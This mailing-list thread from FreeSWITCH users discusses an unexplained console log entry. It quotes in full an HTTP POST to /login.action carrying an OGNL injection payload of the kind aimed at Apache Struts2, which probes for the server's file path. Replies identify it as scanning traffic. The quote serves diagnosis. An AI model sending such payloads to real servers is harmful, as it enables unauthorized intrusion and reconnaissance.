[Freeswitch-users] mystery console message

Sergey Safarov s.safarov at gmail.com
Wed Nov 18 20:32:23 MSK 2015


It hacker's scans hosts in Internet and trying get info about HTTP server.

On Wed, Nov 18, 2015, 20:12 Anthony Minessale <anthony.minessale at gmail.com>
wrote:

> Looks like a browser trying to go to the SIP port listening to TCP.
>
>
> On Wed, Nov 18, 2015 at 11:02 AM, Russell Treleaven <
> rtreleaven at bunnykick.ca> wrote:
>
>> I saw this on the freeswitch console months ago and did not get around to
>> following up on it until now.
>> A freeswitch profile is listening on :8080
>>
>> a.b.c.d = remote address
>> w.x.y.z = freeswitch address
>>
>> What is this?
>> Is it a concern?
>>
>> recv 607 bytes from tcp/[a.b.c.d]:4423 at 17:50:50.225319:
>>
>>  ------------------------------------------------------------------------
>>    POST /login.action HTTP/1.1
>>    User-Agent: Mozilla/5.0
>>    Accept: */*
>>    Content-Type: application/x-www-form-urlencoded
>>    Host: w.x.y.z:8080
>>
>> Content-Length: 395
>>    Expect: 100-continue
>>    Connection: Keep-Alive
>>
>>
>>  redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()}
>>
>>
>> _________________________________________________________________________
>> Professional FreeSWITCH Consulting Services:
>> consulting at freeswitch.org
>> http://www.freeswitchsolutions.com
>>
>> Official FreeSWITCH Sites
>> http://www.freeswitch.org
>> http://confluence.freeswitch.org
>> http://www.cluecon.com
>>
>> FreeSWITCH-users mailing list
>> FreeSWITCH-users at lists.freeswitch.org
>> http://lists.freeswitch.org/mailman/listinfo/freeswitch-users
>> UNSUBSCRIBE:http://lists.freeswitch.org/mailman/options/freeswitch-users
>> http://www.freeswitch.org
>>
>
>
>
> --
> Anthony Minessale II       ♬ @anthmfs  ♬ @FreeSWITCH  ♬
>
>http://freeswitch.org/http://cluecon.com/> http://twitter.com/FreeSWITCH
> ☞ irc.freenode.net #freeswitch ☞ *http://freeswitch.org/g+
> <http://freeswitch.org/g+>*
>
> ClueCon Weekly Development Call
> ☎ sip:888 at conference.freeswitch.org  ☎ +19193869900
>
> https://www.youtube.com/watch?v=9XXgW34t40s
> https://www.youtube.com/watch?v=NLaDpGQuZDA
> _________________________________________________________________________
> Professional FreeSWITCH Consulting Services:
> consulting at freeswitch.org
> http://www.freeswitchsolutions.com
>
> Official FreeSWITCH Sites
> http://www.freeswitch.org
> http://confluence.freeswitch.org
> http://www.cluecon.com
>
> FreeSWITCH-users mailing list
> FreeSWITCH-users at lists.freeswitch.org
> http://lists.freeswitch.org/mailman/listinfo/freeswitch-users
> UNSUBSCRIBE:http://lists.freeswitch.org/mailman/options/freeswitch-users
> http://www.freeswitch.org
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.freeswitch.org/pipermail/freeswitch-users/attachments/20151118/41b7d996/attachment-0001.html 


Join us at ClueCon 2016 Aug 8-12, 2016
More information about the FreeSWITCH-users mailing list